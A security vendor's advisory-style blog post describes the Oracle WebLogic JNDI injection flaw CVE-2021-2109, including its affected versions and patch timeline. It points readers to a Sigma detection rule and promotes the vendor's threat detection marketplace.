Oracle WebLogic Server Vulnerability (CVE-2021-2109) Results in Complete Server Takeover
Table of contents:
A high-severity remote code execution issue in Oracle Fusion Middleware Console enables full Oracle WebLogic Server compromise.
New Oracle WebLogic Server Vulnerability
The flaw allows an authenticated actor with high privileges to misuse the “JndiBinding” Handler and launch a JNDI (Java Naming and Direction Interface) injection. This, in turn, enables retrieving and deserialization of a malicious class from the server under the attacker’s control, which results in arbitrary code execution on the Oracle WebLogic Server.
Although the exploitation routine requires authentication, the attacker might overcome this obstacle by leveraging a directory traversal method related to the previously uncovered remote code execution in WebLogic Server (CVE-2020-14882). As a result, CVE-2021-2109 might be easily exploited by an unauthenticated hacker via a single HTTP request.
The vulnerability was assigned a 7.2 score according to CVSS Version 3.1, marking it as a high-severity bug. Notably, security holes in Oracle WebLogic Server quickly grab the attention of threat actors, increasing the chances of CVE-2021-2109 being exploited in the wild.
The vulnerability was reported to Oracle on November 19, 2020, by the Alibaba Cloud Security research group and patched by the vendor on January 20, 2021. The proof of concept exploits (both for authenticated and unauthenticated attackers) was released in January 2021.
The bug affects the following supported versions of Oracle WebLogic Server: 10.3.6.0.0, 12.1.3.0.0, 12.2.1.3.0, 12.2.1.4.0 and 14.1.1.0.0. Users are urged to patch ASAP to prevent possible exploitation attempts.
CVE-2021-2109 Detection
To detect the malicious activity associated with the new Oracle WebLogic Server bug (CVE-2021-2109), you might apply a Sigma rule developed by SOC Prime Threat Bounty developer Emir Erdogan:
https://tdm.socprime.com/tdm/info/yY5BqZlgeBNl/JdjQcncBR-lx4sDxsiba/
The rule has translations to the following platforms:
SIEM: Azure Sentinel, ArcSight, QRadar, Splunk, Sumo Logic, ELK Stack, RSA NetWitness, FireEye Helix, Humio, Graylog, LogPoint
EDR: Carbon Black
MITRE ATT&CK:
Tactics: Initial Access
Techniques: Exploit Public-Facing Application (T1190)
Sign up to the Threat Detection Marketplace for free to reach the 90,000+ curated SOC content library. Over 300 contributors from 70 countries enrich the library each day so that security performers might detect the most alarming cyber threats at the earliest stages of the attack lifecycle. Have a desire to participate in threat hunting activities and develop your own detection rules? Join our Threat Bounty program and get rewarded for your input.